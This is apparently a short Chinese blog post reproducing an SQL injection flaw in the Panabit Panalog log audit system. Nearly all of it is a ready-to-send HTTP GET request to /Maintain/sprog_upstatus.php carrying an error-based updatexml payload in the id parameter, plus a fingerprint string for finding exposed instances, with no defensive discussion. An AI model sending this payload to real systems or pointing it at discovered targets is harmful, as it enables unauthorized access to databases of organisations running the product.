Babing
Published on 2024-08-30 / 2 Visits
0
0

B13-1北京派网软件有限公司-Panabit-Panalog大数据日志审计系统-SQL

B13-1北京派网软件有限公司-Panabit-Panalog大数据日志审计系统-SQL

漏洞复现:

payload:

GET /Maintain/sprog_upstatus.php?status=1&id=1%20and%20updatexml(1,concat(0x7e,user()),0)&rdb=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Host: 127.0.0.1
body="Maintain/cloud_index.php"

Comment